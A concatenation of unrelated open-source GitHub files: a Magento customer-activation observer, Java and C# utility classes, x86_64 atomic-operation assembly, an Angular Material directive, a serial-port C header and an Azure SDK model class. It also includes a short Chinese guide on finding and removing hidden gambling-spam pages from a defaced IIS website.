canvas, Paint paint) { final int viewWidth = CircleImageView.this.getWidth(); final int viewHeight = CircleImageView.this.getHeight(); canvas.drawCircle(viewWidth / 2, viewHeight / 2, (mCircleDiameter / 2 + mShadowRadius), mShadowPaint); canvas.drawCircle(viewWidth / 2, viewHeight / 2, 
(mCircleDiameter / 2), paint); } } }
{ "pile_set_name": "Github" }
This is *italic* and this is **bold**. This is NOT _italic_ and this is __bold__ because --code-safe is turned on.
{ "pile_set_name": "Github" }
<?php
/**
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to [email protected] so we can send you a copy immediately.
 *
 * package Netzarbeiter_CustomerActivation
 * copyright Copyright (c) 2014 Vinai Kopp http://netzarbeiter.com/
 * license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
 */

/**
 * Event observer implementing the "admin must activate new customer
 * accounts" workflow: blocks logins and checkouts of non-activated
 * customers, flags new accounts, sends activation notification emails, and
 * wires the activation status into the adminhtml customer grid.
 */
class Netzarbeiter_CustomerActivation_Model_Observer
{
    // Store-config flag: notify the admin about every new account, even when
    // accounts are activated by default.
    const XML_PATH_ALWAYS_NOTIFY_ADMIN = 'customer/customeractivation/always_send_admin_email';

    /**
     * Fired on customer_login event
     * Check if the customer has been activated (via adminhtml)
     * If not, throw login error
     *
     * @param Varien_Event_Observer $observer
     */
    public function customerLogin($observer)
    {
        $helper = Mage::helper('customeractivation');
        if (!$helper->isModuleActive()) {
            return;
        }
        if ($this->_isApiRequest()) {
            return;
        }
        $customer = $observer->getEvent()->getCustomer();
        $session = Mage::getSingleton('customer/session');

        if (!$customer->getCustomerActivated()) {
            /*
             * Fake the old logout() method without deleting the session and all messages
             */
            $session->setCustomer(Mage::getModel('customer/customer'))
                ->setId(null)
                ->setCustomerGroupId(Mage_Customer_Model_Group::NOT_LOGGED_IN_ID);

            if ($this->_checkRequestRoute('customer', 'account', 'createpost')) {
                /*
                 * If this is a regular registration, simply display message
                 */
                $message = $helper->__('Please wait for your account to be activated');
                $session->addSuccess($message);
            } else {
                /*
                 * All other types of login
                 */
                Mage::throwException($helper->__('This account is not activated.'));
            }
        }
    }

    /**
     * Flag new accounts as such
     *
     * @param Varien_Event_Observer $observer
     */
    public function customerSaveBefore($observer)
    {
        $customer = $observer->getEvent()->getCustomer();
        $helper = Mage::helper('customeractivation');
        $storeId = $helper->getCustomerStoreId($customer);
        if (!$helper->isModuleActive($storeId)) {
            return;
        }
        // No id yet == this save creates the account.
        if (!$customer->getId()) {
            $customer->setCustomerActivationNewAccount(true);
            if ($this->shouldSetDefaultActivationStatus()) {
                $groupId = $customer->getGroupId();
                $defaultStatus = $helper->getDefaultActivationStatus($groupId, $storeId);
                $customer->setCustomerActivated($defaultStatus);
                if (!$defaultStatus) {
                    // Suppress the "enter your billing address for VAT validation" message.
                    // This setting will not be saved, its just for this request.
                    // NOTE: $helper is rebound to the customer/address helper
                    // here; the activation helper is not needed again in this
                    // scope.
                    $helper = Mage::helper('customer/address');
                    if (method_exists($helper, 'isVatValidationEnabled')) {
                        if (is_callable(array($helper, 'isVatValidationEnabled'))) {
                            if (Mage::helper('customer/address')->isVatValidationEnabled($storeId)) {
                                Mage::app()->getStore($storeId)->setConfig(
                                    Mage_Customer_Helper_Address::XML_PATH_VAT_VALIDATION_ENABLED,
                                    false
                                );
                            }
                        }
                    }
                }
            }
        }
    }

    /**
     * Send out emails
     *
     * @param Varien_Event_Observer $observer
     */
    public function customerSaveAfter($observer)
    {
        /** @var Mage_Customer_Model_Customer $customer */
        $customer = $observer->getEvent()->getCustomer();
        $helper = Mage::helper('customeractivation');
        $storeId = $helper->getCustomerStoreId($customer);
        if (!$helper->isModuleActive($storeId)) {
            return;
        }
        $groupId = $customer->getGroupId();
        $defaultStatus = $helper->getDefaultActivationStatus($groupId, $storeId);

        try {
            if (Mage::app()->getStore()->isAdmin()) {
                // Admin just toggled the account from deactivated to activated.
                if (!$customer->getOrigData('customer_activated') && $customer->getCustomerActivated()) {
                    // Send customer email only if it isn't a new account and it isn't activated by default
                    if (!($customer->getCustomerActivationNewAccount() && $defaultStatus)) {
                        $helper->sendCustomerNotificationEmail($customer);
                    }
                }
            } else {
                if ($customer->getCustomerActivationNewAccount()) {
                    // Only notify the admin if the default is deactivated or the "always notify" flag is configured
                    $alwaysNotify = Mage::getStoreConfig(self::XML_PATH_ALWAYS_NOTIFY_ADMIN, $storeId);
                    if (!$defaultStatus || $alwaysNotify) {
                        $helper->sendAdminNotificationEmail($customer);
                    }
                }
                // Clear the flag so later saves are not treated as new accounts.
                $customer->setCustomerActivationNewAccount(false);
            }
        } catch (Exception $e) {
            Mage::throwException($e->getMessage());
        }
    }

    /**
     * Fired on sales_convert_quote_address_to_order; last chance to abort
     * order placement for a not-yet-activated registering customer.
     *
     * @param Varien_Event_Observer $observer
     */
    public function salesConvertQuoteAddressToOrder(Varien_Event_Observer $observer)
    {
        /** @var $address Mage_Sales_Model_Quote_Address */
        $address = $observer->getEvent()->getAddress();
        $this->_abortCheckoutRegistration($address->getQuote());
    }

    /**
     * Abort registration during checkout if default activation status is false.
     *
     * Should work with: onepage checkout, multishipping checkout and custom
     * checkout types, as long as they use the standard converter model
     * Mage_Sales_Model_Convert_Quote.
     *
     * Expected state after checkout:
     * - Customer saved
     * - No order placed
     * - Guest quote still contains items
     * - Customer quote contains no items
     * - Customer redirected to login page
     * - Customer sees message
     *
     * @param Mage_Sales_Model_Quote $quote
     */
    protected function _abortCheckoutRegistration(Mage_Sales_Model_Quote $quote)
    {
        $helper = Mage::helper('customeractivation');
        if (!$helper->isModuleActive($quote->getStoreId())) {
            return;
        }
        if ($this->_isApiRequest()) {
            return;
        }
        if (!Mage::getSingleton('customer/session')->isLoggedIn() && !$quote->getCustomerIsGuest()) {
            // Order is being created by non-activated customer
            $customer = $quote->getCustomer()->save();
            if (!$customer->getCustomerActivated()) {
                // Abort order placement
                // Exception handling can not be assumed to be useful
                // Todo: merge guest quote to customer quote and save customer quote, but don't log customer in

                // Add message
                $message = $helper->__(
                    'Please wait for your account to be activated, then log in and continue with the checkout'
                );
                Mage::getSingleton('core/session')->addSuccess($message);

                // Handle redirect to login page
                $targetUrl = Mage::getUrl('customer/account/login');
                $response = Mage::app()->getResponse();
                if (Mage::app()->getRequest()->isAjax()) {
                    // Assume one page checkout
                    $result = array('redirect' => $targetUrl);
                    $response->setBody(Mage::helper('core')->jsonEncode($result));
                } else {
                    if ($response->canSendHeaders(true)) {
                        // Assume multishipping checkout
                        $response->clearHeader('location')
                            ->setRedirect($targetUrl);
                    }
                }
                $response->sendResponse();
                /* ugly, but we need to stop the further order processing */
                exit();
            }
        }
    }

    /**
     * Return true if the request is made via the api
     *
     * @return boolean
     */
    protected function _isApiRequest()
    {
        return Mage::app()->getRequest()->getModuleName() === 'api';
    }

    /**
     * Check the current module, controller and action against the given values.
     *
     * @param string $module
     * @param string $controller
     * @param string $action
     * @return bool
     */
    protected function _checkRequestRoute($module, $controller, $action)
    {
        $req = Mage::app()->getRequest();
        if (strtolower($req->getModuleName()) == $module
            && strtolower($req->getControllerName()) == $controller
            && strtolower($req->getActionName()) == $action
        ) {
            return true;
        }
        return false;
    }

    /**
     * Check the current controller and action match the passed names
     *
     * @param string $controller
     * @param string $action
     * @return bool
     */
    protected function _checkControllerAction($controller, $action)
    {
        $req = Mage::app()->getRequest();
        return $this->_checkRequestRoute($req->getModuleName(), $controller, $action);
    }

    /**
     * Add customer activation option to the mass action block.
     *
     * This can't be done during the block abstract event
     *
     * @param Varien_Event_Observer $observer
     */
    public function adminhtmlBlockHtmlBefore(Varien_Event_Observer $observer)
    {
        // Check the grid is the customer grid
        if ($observer->getBlock()->getId() != 'customerGrid') {
            return;
        }

        // Check if there is a massaction block and if yes, add the massaction for customeractivation
        $massBlock = $observer->getBlock()->getMassactionBlock();
        if ($massBlock) {
            /** @var $helper Netzarbeiter_CustomerActivation_Helper_Data */
            $helper = Mage::helper('customeractivation');
            if (!$helper->isModuleActiveInAdmin()) {
                return;
            }
            $noEmail = Netzarbeiter_CustomerActivation_Helper_Data::STATUS_ACTIVATE_WITHOUT_EMAIL;
            $withEmail = Netzarbeiter_CustomerActivation_Helper_Data::STATUS_ACTIVATE_WITH_EMAIL;
            $deactivate = Netzarbeiter_CustomerActivation_Helper_Data::STATUS_DEACTIVATE;
            $massBlock->addItem(
                'customer_activated',
                array(
                    'label' => $helper->__('Customer Activated'),
                    'url' => Mage::getUrl('adminhtml/customerActivation/massActivation'),
                    'additional' => array(
                        'status' => array(
                            'name' => 'customer_activated',
                            'type' => 'select',
                            'class' => 'required-entry',
                            'label' => $helper->__('Customer Activated'),
                            'values' => array(
                                $noEmail => $helper->__('Yes (No Notification)'),
                                $withEmail => $helper->__('Yes (With Notification)'),
                                $deactivate => $helper->__('No')
                            )
                        )
                    )
                )
            );
        }
    }

    /**
     * Add the customer_activated attribute to the customer grid collection
     *
     * @param Varien_Event_Observer $observer
     */
    public function eavCollectionAbstractLoadBefore(Varien_Event_Observer $observer)
    {
        if (!Mage::helper('customeractivation')->isModuleActiveInAdmin()) {
            return;
        }
        if (Mage::app()->getRequest()->getControllerName() !== 'customer') {
            return;
        }
        /** @var $collection Mage_Customer_Model_Resource_Customer_Collection */
        $collection = $observer->getEvent()->getCollection();

        // Only add attribute to customer collections
        $customerTypeId = Mage::getSingleton('eav/config')->getEntityType('customer')->getId();
        $collectionTypeId = $collection->getEntity()->getTypeId();
        if ($customerTypeId == $collectionTypeId) {
            $collection->addAttributeToSelect('customer_activated');
        }
    }

    /**
     * Add customer_activated column to CSV and XML exports
     *
     * @param Varien_Event_Observer $observer
     */
    public function coreBlockAbstractPrepareLayoutAfter(Varien_Event_Observer $observer)
    {
        if (!Mage::helper('customeractivation')->isModuleActiveInAdmin()) {
            return;
        }
        if (Mage::app()->getRequest()->getControllerName() !== 'customer') {
            return;
        }
        $block = $observer->getBlock();

        if ($block->getType() === 'adminhtml/customer_grid') {
            // I don't think we need to limit applying the column by action
            //$action = Mage::app()->getRequest()->getActionName();
            //if (in_array($action, array('grid', 'index', 'exportCsv', 'exportXml'))) {
            $this->_addActivationStatusColumn($block);
            //}
        }
    }

    /**
     * Add the activation status column to the customer grid block.
     *
     * This is used from different events when displaying the block as well as
     * during exporting the grid to CSV or XML.
     *
     * @param Mage_Adminhtml_Block_Widget_Grid $block
     */
    protected function _addActivationStatusColumn(Mage_Adminhtml_Block_Widget_Grid $block)
    {
        /** @var $helper Netzarbeiter_CustomerActivation_Helper_Data */
        $helper = Mage::helper('customeractivation');

        // Add the attribute as a column to the grid
        $block->addColumnAfter(
            'customer_activated',
            array(
                'header' => $helper->__('Customer Activated'),
                'align' => 'center',
                'width' => '80px',
                'type' => 'options',
                'options' => array(
                    '0' => $helper->__('No'),
                    '1' => $helper->__('Yes')
                ),
                'default' => '0',
                'index' => 'customer_activated',
                'renderer' => 'customeractivation/adminhtml_widget_grid_column_renderer_boolean'
            ),
            'customer_since'
        );

        // Set the new columns order.. otherwise our column would be the last one
        $block->sortColumnsByOrder();
    }

    /**
     * Reportedly on Magento 1.6 customers are logged in automatically
     * by the lost password functionality (must be some customization actually).
     *
     * This observer method removes the customer id from the customer/session,
     * in effect causing a logout just in case.
     *
     * @param Varien_Event_Observer $observer
     */
    public function controllerActionPostdispatchCustomerAccountResetPasswordPost(Varien_Event_Observer $observer)
    {
        if (!Mage::helper('customeractivation')->isModuleActive()) {
            return;
        }
        if (version_compare(Mage::getVersion(), '1.7', '<')) {
            $session = Mage::getSingleton('customer/session');
            $customer = $session->getCustomer();
            if (!$customer->getCustomerActivated() && $session->isLoggedIn()) {
                $session->setCustomerId(null)->setId(null);
            }
        }
    }

    // The default activation status must not be forced when an admin edits a
    // customer or when the save comes in via the API.
    private function shouldSetDefaultActivationStatus()
    {
        return !$this->isAdminEditCustomerSaveAction() && !$this->_isApiRequest();
    }

    // True when the current request is the adminhtml customer save action.
    private function isAdminEditCustomerSaveAction()
    {
        return Mage::app()->getStore()->isAdmin()
            && $this->_checkControllerAction('customer', 'save');
    }
}
{ "pile_set_name": "Github" }
package org.dimdev.utils;

import java.util.HashMap;
import java.util.Map;

/**
 * A type-safe heterogeneous container mapping a {@link Class} key to an
 * instance of that class. The unchecked casts in the getters are safe
 * because {@link #put} and {@link #castAndPut} only ever store values
 * assignable to their key type.
 */
public class InstanceMap {
    private final Map<Class<?>, Object> delegate = new HashMap<>();

    /** Associates {@code value} with its class {@code key}. */
    public <T> void put(Class<T> key, T value) {
        delegate.put(key, value);
    }

    /** Stores {@code value} under {@code key}, checking assignability at runtime. */
    public void castAndPut(Class<?> key, Object value) {
        delegate.put(key, key.cast(value));
    }

    /** Returns the instance stored for {@code key}, or {@code null} if absent. */
    public <T> T get(Class<T> key) {
        //noinspection unchecked
        return (T) delegate.get(key);
    }

    /** Removes and returns the instance stored for {@code key}, or {@code null}. */
    public <T> T remove(Class<T> key) {
        //noinspection unchecked
        return (T) delegate.remove(key);
    }

    /** Removes every entry. */
    public void clear() {
        delegate.clear();
    }

    /** Returns whether an instance is stored for {@code key}. */
    public boolean containsKey(Class<?> key) {
        return delegate.containsKey(key);
    }

    /** Returns whether {@code value} is stored under any key. */
    public boolean containsValue(Object value) {
        return delegate.containsValue(value);
    }
}
{ "pile_set_name": "Github" }
/*
 * Copyright (c) 1991-1994 by Xerox Corporation.  All rights reserved.
 * Copyright (c) 1996-1999 by Silicon Graphics.  All rights reserved.
 * Copyright (c) 1999-2003 by Hewlett-Packard Company. All rights reserved.
 *
 *
 * THIS MATERIAL IS PROVIDED AS IS, WITH ABSOLUTELY NO WARRANTY EXPRESSED
 * OR IMPLIED. ANY USE IS AT YOUR OWN RISK.
 *
 * Permission is hereby granted to use or copy this program
 * for any purpose, provided the above notices are retained on all copies.
 * Permission to modify the code and to distribute modified code is granted,
 * provided the above notices are retained, and a notice that the code was
 * modified is included with the above copyright notice.
 *
 * Some of the machine specific code was borrowed from our GC distribution.
 */

#include "../all_aligned_atomic_load_store.h"

/* Real X86 implementations, appear to enforce ordering between memory
   operations, EXCEPT that a later read can pass earlier writes, presumably
   due to the visible presence of store buffers.
   We ignore the fact that the official specs seem to be much weaker (and
   arguably too weak to be usable). */
#include "../ordered_except_wr.h"

#include "../test_and_set_t_is_char.h"

#include "../standard_ao_double_t.h"

/* Full memory barrier. */
AO_INLINE void
AO_nop_full(void)
{
  /* Note: "mfence" (SSE2) is supported on all x86_64/amd64 chips. */
  __asm__ __volatile__ ("mfence" : : : "memory");
}
#define AO_HAVE_nop_full

/* As far as we can tell, the lfence and sfence instructions are not
   currently needed or useful for cached memory accesses. */

/* Atomically add incr to *p; returns the value *p held BEFORE the add
   ("lock; xadd" is a locked exchange-and-add). */
AO_INLINE AO_t
AO_fetch_and_add_full (volatile AO_t *p, AO_t incr)
{
  AO_t result;

  __asm__ __volatile__ ("lock; xaddq %0, %1" :
                        "=r" (result), "=m" (*p) : "0" (incr) /* , "m" (*p) */
                        : "memory");
  return result;
}
#define AO_HAVE_fetch_and_add_full

/* 8-bit variant of fetch_and_add ("b" suffix, "q" register constraint
   because byte ops need a byte-addressable register). */
AO_INLINE unsigned char
AO_char_fetch_and_add_full (volatile unsigned char *p, unsigned char incr)
{
  unsigned char result;

  __asm__ __volatile__ ("lock; xaddb %0, %1" :
                        "=q" (result), "=m" (*p) : "0" (incr) /* , "m" (*p) */
                        : "memory");
  return result;
}
#define AO_HAVE_char_fetch_and_add_full

/* 16-bit variant of fetch_and_add. */
AO_INLINE unsigned short
AO_short_fetch_and_add_full (volatile unsigned short *p, unsigned short incr)
{
  unsigned short result;

  __asm__ __volatile__ ("lock; xaddw %0, %1" :
                        "=r" (result), "=m" (*p) : "0" (incr) /* , "m" (*p) */
                        : "memory");
  return result;
}
#define AO_HAVE_short_fetch_and_add_full

/* 32-bit variant of fetch_and_add. */
AO_INLINE unsigned int
AO_int_fetch_and_add_full (volatile unsigned int *p, unsigned int incr)
{
  unsigned int result;

  __asm__ __volatile__ ("lock; xaddl %0, %1" :
                        "=r" (result), "=m" (*p) : "0" (incr) /* , "m" (*p) */
                        : "memory");
  return result;
}
#define AO_HAVE_int_fetch_and_add_full

/* Atomic *p |= incr (no old value returned). */
AO_INLINE void
AO_or_full (volatile AO_t *p, AO_t incr)
{
  __asm__ __volatile__ ("lock; orq %1, %0" :
                        "=m" (*p) : "r" (incr) /* , "m" (*p) */
                        : "memory");
}
#define AO_HAVE_or_full

/* Atomically set the test-and-set byte to 0xff; returns its old value. */
AO_INLINE AO_TS_VAL_t
AO_test_and_set_full (volatile AO_TS_t *addr)
{
  AO_TS_t oldval;
  /* Note: the "xchg" instruction does not need a "lock" prefix */
  __asm__ __volatile__ ("xchg %b0, %1"
                        : "=q"(oldval), "=m"(*addr)
                        : "0"(0xff) /* , "m"(*addr) */
                        : "memory");
  return (AO_TS_VAL_t)oldval;
}
#define AO_HAVE_test_and_set_full

/* Returns nonzero if the comparison succeeded (i.e. *addr was equal to old
   and has been replaced by new_val; "setz" captures cmpxchg's ZF). */
AO_INLINE int
AO_compare_and_swap_full (volatile AO_t *addr, AO_t old, AO_t new_val)
{
  char result;
  __asm__ __volatile__ ("lock; cmpxchgq %2, %0; setz %1"
                        : "=m"(*addr), "=a"(result)
                        : "r" (new_val), "a"(old) : "memory");
  return (int) result;
}
#define AO_HAVE_compare_and_swap_full

#ifdef AO_CMPXCHG16B_AVAILABLE
/* NEC LE-IT: older AMD Opterons are missing this instruction.
 * On these machines SIGILL will be thrown.
 * Define AO_WEAK_DOUBLE_CAS_EMULATION to have an emulated
 * (lock based) version available */
/* HB: Changed this to not define either by default.  There are
 * enough machines and tool chains around on which cmpxchg16b
 * doesn't work.  And the emulation is unsafe by our usual rules.
 * However both are clearly useful in certain cases.
 */
/* Double-width (128-bit) CAS: compares/exchanges the rdx:rax pair against
   *addr and swaps in rcx:rbx on success. */
AO_INLINE int
AO_compare_double_and_swap_double_full (volatile AO_double_t *addr,
                                        AO_t old_val1, AO_t old_val2,
                                        AO_t new_val1, AO_t new_val2)
{
  char result;
  __asm__ __volatile__ ("lock; cmpxchg16b %0; setz %1"
                        : "=m"(*addr), "=a"(result)
                        : /* "m" (*addr), */ "d" (old_val2), "a" (old_val1),
                          "c" (new_val2), "b" (new_val1) : "memory");
  return (int) result;
}
#define AO_HAVE_compare_double_and_swap_double_full
#else
/* this one provides spinlock based emulation of CAS implemented in */
/* atomic_ops.c.  We probably do not want to do this here, since it is  */
/* not atomic with respect to other kinds of updates of *addr.  On the  */
/* other hand, this may be a useful facility on occasion.               */
#ifdef AO_WEAK_DOUBLE_CAS_EMULATION
int AO_compare_double_and_swap_double_emulation(volatile AO_double_t *addr,
                                                AO_t old_val1, AO_t old_val2,
                                                AO_t new_val1, AO_t new_val2);

AO_INLINE int
AO_compare_double_and_swap_double_full(volatile AO_double_t *addr,
                                       AO_t old_val1, AO_t old_val2,
                                       AO_t new_val1, AO_t new_val2)
{
  return AO_compare_double_and_swap_double_emulation(addr,
                                                     old_val1, old_val2,
                                                     new_val1, new_val2);
}
#define AO_HAVE_compare_double_and_swap_double_full
#endif /* AO_WEAK_DOUBLE_CAS_EMULATION */

#endif /* AO_CMPXCHG16B_AVAILABLE */
{ "pile_set_name": "Github" }
using System;
using WampSharp.Core.Listener;
using WampSharp.Core.Proxy;
using WampSharp.V1.Core.Contracts;
using WampSharp.V1.Core.Curie;
using WampSharp.V1.Cra;

namespace WampSharp.V1.Core.Listener.ClientBuilder
{
    /// <summary>
    /// Proxy representing a connected WAMP v1 client: outgoing messages go
    /// through the <see cref="WampClientProxyBase"/> plumbing, CURIE
    /// prefix/URI mapping is delegated to an internal mapper, and connection
    /// state/events are forwarded from the wrapped
    /// <see cref="IWampConnectionMonitor"/>.
    /// </summary>
    internal class WampClientProxy : WampClientProxyBase, IWampClient, IDisposable, IWampCurieMapper, IWampConnectionMonitor
    {
        // Per-client CURIE prefix -> URI mappings.
        private readonly IWampCurieMapper mCurieMapper = new WampCurieMapper();
        // Underlying connection whose state/events this proxy re-exposes.
        private readonly IWampConnectionMonitor mMonitor;
        // Released on Dispose(); may be null.
        private readonly IDisposable mDisposable;

        /// <param name="messageHandler">Sink for outgoing messages.</param>
        /// <param name="requestSerializer">Serializer for outgoing requests.</param>
        /// <param name="monitor">Connection monitor to forward state/events from.</param>
        /// <param name="disposable">Optional resource disposed together with this proxy.</param>
        public WampClientProxy(IWampOutgoingMessageHandler messageHandler,
                               IWampOutgoingRequestSerializer requestSerializer,
                               IWampConnectionMonitor monitor,
                               IDisposable disposable) :
                                   base(messageHandler, requestSerializer)
        {
            mMonitor = monitor;
            mDisposable = disposable;
        }

        /// <summary>Gets or sets the WAMP session id of this client.</summary>
        public string SessionId { get; set; }

        /// <summary>Gets or sets the WAMP-CRA authenticator for this client, if any.</summary>
        public IWampCraAuthenticator CraAuthenticator { get; set; }

        /// <summary>Disposes the resource supplied at construction (null-safe).</summary>
        public void Dispose()
        {
            mDisposable?.Dispose();
        }

        /// <summary>Expands a CURIE to its full URI via the internal mapper.</summary>
        public string Resolve(string curie)
        {
            return mCurieMapper.Resolve(curie);
        }

        /// <summary>Registers a CURIE prefix for the given URI.</summary>
        public void Map(string prefix, string uri)
        {
            mCurieMapper.Map(prefix, uri);
        }

        /// <summary>Raised when the underlying connection closes (forwarded).</summary>
        public event EventHandler ConnectionClosed
        {
            add => mMonitor.ConnectionClosed += value;
            remove => mMonitor.ConnectionClosed -= value;
        }

        /// <summary>Whether the underlying connection is currently open (forwarded).</summary>
        public bool Connected => mMonitor.Connected;
    }
}
{ "pile_set_name": "Github" }
/*!
 * Angular Material Design
 * https://github.com/angular/material
 * @license MIT
 * v1.0.6
 */
goog.provide('ng.material.components.fabActions');
goog.require('ng.material.core');
(function() {
  'use strict';

  /**
   * @ngdoc module
   * @name material.components.fabActions
   */
  angular
    .module('material.components.fabActions', ['material.core'])
    .directive('mdFabActions', MdFabActionsDirective);

  /**
   * @ngdoc directive
   * @name mdFabActions
   * @module material.components.fabActions
   *
   * @restrict E
   *
   * @description
   * The `<md-fab-actions>` directive is used inside of a `<md-fab-speed-dial>` or
   * `<md-fab-toolbar>` directive to mark an element (or elements) as the actions and setup the
   * proper event listeners.
   *
   * @usage
   * See the `<md-fab-speed-dial>` or `<md-fab-toolbar>` directives for example usage.
   */
  function MdFabActionsDirective() {
    return {
      restrict: 'E',

      require: ['^?mdFabSpeedDial', '^?mdFabToolbar'],

      compile: function(element, attributes) {
        var children = element.children();

        var hasNgRepeat = false;

        // ng-repeat may appear under any of its valid attribute prefixes
        // (ng-repeat, data-ng-repeat, x-ng-repeat); check all three.
        angular.forEach(['', 'data-', 'x-'], function(prefix) {
          hasNgRepeat = hasNgRepeat || (children.attr(prefix + 'ng-repeat') ? true : false);
        });

        // Support both ng-repeat and static content
        if (hasNgRepeat) {
          children.addClass('md-fab-action-item');
        } else {
          // Wrap every child in a new div and add a class that we can scale/fling independently
          children.wrap('<div class="md-fab-action-item">');
        }
      }
    }
  }

})();

ng.material.components.fabActions = angular.module("material.components.fabActions");
{ "pile_set_name": "Github" }
## 第3篇:批量挂黑页

作为一个网站管理员,你采用开源CMS做网站,比如dedecms,但是有一天,你忽然发现不知何时,网站的友情链接模块被挂大量垃圾链接,网站出现了很多不该有的目录,里面全是博彩相关的网页。而且,攻击者在挂黑页以后,会在一些小论坛注册马甲将你的网站黑页链接发到论坛,引爬虫收录。在搜索引擎搜索网站地址时,搜索结果中会出现一些被收录的博彩页面,严重影响了网站形象。

### 原因分析

网站存在高危漏洞,常见于一些存在安全漏洞的开源CMS,利用0day批量拿站上传黑页。

### 现象描述:

某网站被挂了非常多博彩链接,链接形式如下:

​	<http://www.xxx.com/upload/aomendduchangzaixiandobo/index.html>

​	<http://www.xxx.com/upload/aomendduchangzaixian/index.html>

​	<http://www.xxx.com/upload/aomenzhengguidubowangzhan/index.html>

链接可以访问,直接访问物理路径也可以看到文件,但是打开网站目录并没有发现这些文件,这些文件到底藏在了哪?

访问这些链接,跳转到如图页面:

![](./image/3-1.png)

### 问题处理:

1、打开电脑文件夹选项卡,取消“隐藏受保护的操作系统文件”勾选,把“隐藏文件和文件夹”下面的单选选择“显示隐藏的文件、文件夹和驱动器”。

![](./image/3-2.png)

2、再次查看,可以看到半透明的文件夹,清除隐藏文件夹及所有页面

![](./image/3-3.png)

3、然后清除IIS临时压缩文件 C:\inetpub\temp\IIS Temporary Compressed Files\WEBUI\$^_gzip_D^\WEB\WEBUI\UPLOAD

![](./image/3-4.png)

4、投诉快照,申请删除相关的网页收录,减少对网站的影响。
{ "pile_set_name": "Github" }
#ifndef _SERIALIB_H
#define _SERIALIB_H

#include <sys/time.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/shm.h>
#include <termios.h>
#include <string.h>
#include <fcntl.h>
#include <stdio.h>

/* Handle for an open serial port. */
typedef struct serial_s {
    speed_t baud;  /* termios speed constant (presumably converted from the
                      plain int given to serial_open -- confirm in serialib.c) */
    char* port;    /* device path, e.g. "/dev/ttyUSB0" */
    int fd;        /* underlying file descriptor */
} serial;

/* Allocate *s and open `port` at `baud`. Returns a status code
   (success/failure convention defined in serialib.c). */
int serial_open(serial **s, char* port, int baud);
/* Read a single byte into *p. */
int serial_read_char(serial *s, char *p);
/* Read up to `len` bytes into `buf`, stopping at the `eol` character. */
int serial_read(serial *s, char *buf, char eol, unsigned int len);
/* Write the single byte `p`. */
int serial_write_char(serial *s, char p);
/* Write the NUL-terminated string `str`. */
int serial_write(serial *s, char* str);

/* Simple stopwatch built on struct timeval. */
typedef struct timeval timer;

/* Allocate *t and record the current time as the start point
   (presumed -- confirm in serialib.c). */
void timer_init(timer **t);
/* Time elapsed since timer_init (unit not visible in this header --
   see serialib.c). */
unsigned long int timer_elapsed(timer *t);

#endif
{ "pile_set_name": "Github" }
/**
 * Copyright (c) Microsoft Corporation. All rights reserved.
 * Licensed under the MIT License. See License.txt in the project root for
 * license information.
 *
 * Code generated by Microsoft (R) AutoRest Code Generator.
 */

package com.microsoft.azure.management.network.v2019_04_01;

import java.util.List;
import com.fasterxml.jackson.annotation.JsonProperty;

/**
 * Rewrite rule of an application gateway.
 * <p>
 * Plain data-transfer object following the fluent "wither" pattern: each
 * {@code withX} setter returns {@code this} for chaining, and all properties
 * are optional (may be {@code null}). NOTE: this file is produced by the
 * AutoRest code generator (see header); manual edits may be overwritten on
 * regeneration.
 */
public class ApplicationGatewayRewriteRule {
    /**
     * Name of the rewrite rule that is unique within an Application Gateway.
     */
    @JsonProperty(value = "name")
    private String name;

    /**
     * Rule Sequence of the rewrite rule that determines the order of execution
     * of a particular rule in a RewriteRuleSet.
     */
    @JsonProperty(value = "ruleSequence")
    private Integer ruleSequence;

    /**
     * Conditions based on which the action set execution will be evaluated.
     */
    @JsonProperty(value = "conditions")
    private List<ApplicationGatewayRewriteRuleCondition> conditions;

    /**
     * Set of actions to be done as part of the rewrite Rule.
     */
    @JsonProperty(value = "actionSet")
    private ApplicationGatewayRewriteRuleActionSet actionSet;

    /**
     * Get name of the rewrite rule that is unique within an Application Gateway.
     *
     * @return the name value
     */
    public String name() {
        return this.name;
    }

    /**
     * Set name of the rewrite rule that is unique within an Application Gateway.
     *
     * @param name the name value to set
     * @return the ApplicationGatewayRewriteRule object itself.
     */
    public ApplicationGatewayRewriteRule withName(String name) {
        this.name = name;
        return this;
    }

    /**
     * Get rule Sequence of the rewrite rule that determines the order of execution of a particular rule in a RewriteRuleSet.
     *
     * @return the ruleSequence value
     */
    public Integer ruleSequence() {
        return this.ruleSequence;
    }

    /**
     * Set rule Sequence of the rewrite rule that determines the order of execution of a particular rule in a RewriteRuleSet.
     *
     * @param ruleSequence the ruleSequence value to set
     * @return the ApplicationGatewayRewriteRule object itself.
     */
    public ApplicationGatewayRewriteRule withRuleSequence(Integer ruleSequence) {
        this.ruleSequence = ruleSequence;
        return this;
    }

    /**
     * Get conditions based on which the action set execution will be evaluated.
     *
     * @return the conditions value
     */
    public List<ApplicationGatewayRewriteRuleCondition> conditions() {
        return this.conditions;
    }

    /**
     * Set conditions based on which the action set execution will be evaluated.
     *
     * @param conditions the conditions value to set
     * @return the ApplicationGatewayRewriteRule object itself.
     */
    public ApplicationGatewayRewriteRule withConditions(List<ApplicationGatewayRewriteRuleCondition> conditions) {
        this.conditions = conditions;
        return this;
    }

    /**
     * Get set of actions to be done as part of the rewrite Rule.
     *
     * @return the actionSet value
     */
    public ApplicationGatewayRewriteRuleActionSet actionSet() {
        return this.actionSet;
    }

    /**
     * Set set of actions to be done as part of the rewrite Rule.
     *
     * @param actionSet the actionSet value to set
     * @return the ApplicationGatewayRewriteRule object itself.
     */
    public ApplicationGatewayRewriteRule withActionSet(ApplicationGatewayRewriteRuleActionSet actionSet) {
        this.actionSet = actionSet;
        return this;
    }

}
{ "pile_set_name": "Github" }
